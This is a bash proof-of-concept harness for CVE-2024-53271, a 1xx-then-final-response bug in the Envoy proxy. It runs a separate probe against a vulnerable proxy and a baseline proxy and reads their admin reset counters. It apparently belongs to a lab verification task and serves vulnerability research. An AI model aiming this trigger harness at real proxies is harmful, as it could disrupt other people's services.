#!/usr/bin/env bash
# CVE-2024-53271 — Envoy BALSA HTTP/1.1 double-MessageDone() differential PoC.
#
# Args (all positional, concrete values in exploit.md):
#   $1 VULN_HOST   $2 VULN_PORT
#   $3 BASE_HOST   $4 BASE_PORT
#   $5 TRIGGER_PATH   $6 PLAIN_PATH
#   $7 COUNT          $8 CONCURRENCY
#
# Drives the liveness pre-check (/plain) on both proxies, then the trigger
# probe (/trigger) on both proxies, classifying each request clean vs failed.
# It does NOT decide pass/fail — it surfaces the per-config clean-completion
# rate so the verifier can read the differential.
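# Only -u is enabled. -e and pipefail are left off on purpose: every stage
# below is best-effort, so that one failing probe or an unreachable admin
# listener does not hide the remaining measurements from the verifier.
set -u

if (( $# < 8 )); then
  printf 'usage: %s VULN_HOST VULN_PORT BASE_HOST BASE_PORT TRIGGER_PATH PLAIN_PATH COUNT CONCURRENCY\n' \
    "${0##*/}" >&2
  exit 2
fi

VULN_HOST="$1"; VULN_PORT="$2"
BASE_HOST="$3"; BASE_PORT="$4"
TRIGGER_PATH="$5"; PLAIN_PATH="$6"
COUNT="$7"; CONC="$8"

# Admin listener ports, used only by the corroboration step at the end.
# The defaults are the values this script has always used; set the
# environment variables to point at a differently configured lab.
VULN_ADMIN_PORT="${VULN_ADMIN_PORT:-9900}"
BASE_ADMIN_PORT="${BASE_ADMIN_PORT:-9901}"

# Upper bound, in seconds, on each admin /stats fetch so that an unresponsive
# proxy cannot stall the run.
readonly ADMIN_TIMEOUT_SECS=10

# Counters printed as corroboration for the probe results.
readonly COUNTER_RE='ingress_http\.downstream_rq_(total|completed|rx_reset|tx_reset)'

# Resolve the directory holding this script. CDPATH is cleared so cd prints
# nothing, and -- protects against a path that begins with '-'.
HERE="$(CDPATH= cd -- "$(dirname -- "$0")" && pwd)"
PROBE="$HERE/probe.py"

# Fail early on a broken setup: without the probe every measurement below
# would be an interpreter error rather than a request result.
if [[ ! -f "$PROBE" ]]; then
  printf 'error: probe script not found: %s\n' "$PROBE" >&2
  exit 1
fi
if ! command -v python3 >/dev/null; then
  printf 'error: python3 not found in PATH\n' >&2
  exit 1
fi

#######################################
# Print a three-line section banner.
# Arguments: $1 - banner title
# Outputs:   banner on stdout
#######################################
banner() {
  printf '%s\n' "##############################################################"
  printf '%s\n' "# $1"
  printf '%s\n' "##############################################################"
}

#######################################
# Run probe.py once against one proxy and path.
# Globals:   PROBE, COUNT, CONC (read)
# Arguments: $1 - label, $2 - host, $3 - port, $4 - request path
# Outputs:   probe output on stdout; a note on stderr if the probe exits
#            non-zero (probe.py's exit-code convention is not visible from
#            this script, so the status is reported, not interpreted)
# Returns:   0 always; this script does not decide pass/fail
#######################################
run_probe() {
  local label=$1 host=$2 port=$3 path=$4
  local rc=0
  python3 "$PROBE" "$label" "$host" "$port" "$path" "$COUNT" "$CONC" || rc=$?
  if (( rc != 0 )); then
    printf 'note: probe %s exited with status %d\n' "$label" "$rc" >&2
  fi
  return 0
}

#######################################
# Fetch /stats from one admin listener and print the request counters.
# Globals:   ADMIN_TIMEOUT_SECS, COUNTER_RE (read)
# Arguments: $1 - label, $2 - admin host, $3 - admin port
# Outputs:   matching counters on stdout; a warning on stderr when the fetch
#            fails or nothing matches, so that an empty section is never
#            mistaken for "counters are zero"
# Returns:   0 always (corroboration is best-effort)
#######################################
dump_counters() {
  local label=$1 host=$2 port=$3
  local stats
  echo "--- ${label} admin ingress_http downstream rq counters ---"
  # -f turns HTTP errors into a failure, -S keeps curl's error text visible
  # despite -s, and --max-time bounds a fetch from a hung listener.
  if ! stats=$(curl -fsS --max-time "$ADMIN_TIMEOUT_SECS" \
      "http://${host}:${port}/stats"); then
    printf 'warn: %s admin stats unavailable at %s:%s; no counters to corroborate\n' \
      "$label" "$host" "$port" >&2
    return 0
  fi
  grep -E -- "$COUNTER_RE" <<<"$stats" \
    || printf 'warn: %s admin stats had no matching counters\n' "$label" >&2
  return 0
}

banner "PRE-CHECK: liveness on /plain (no 1xx) — expected CLEAN on both"
run_probe "VULN-LIVENESS"     "$VULN_HOST" "$VULN_PORT" "$PLAIN_PATH"
run_probe "BASELINE-LIVENESS" "$BASE_HOST" "$BASE_PORT" "$PLAIN_PATH"

banner "TRIGGER: /trigger (102-then-final) — the 1xx-then-final probe"
run_probe "VULN-TRIGGER"      "$VULN_HOST" "$VULN_PORT" "$TRIGGER_PATH"
run_probe "BASELINE-TRIGGER"  "$BASE_HOST" "$BASE_PORT" "$TRIGGER_PATH"

banner "Downstream reset / completion counters (corroboration)"
dump_counters "VULN"     "$VULN_HOST" "$VULN_ADMIN_PORT"
dump_counters "BASELINE" "$BASE_HOST" "$BASE_ADMIN_PORT"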
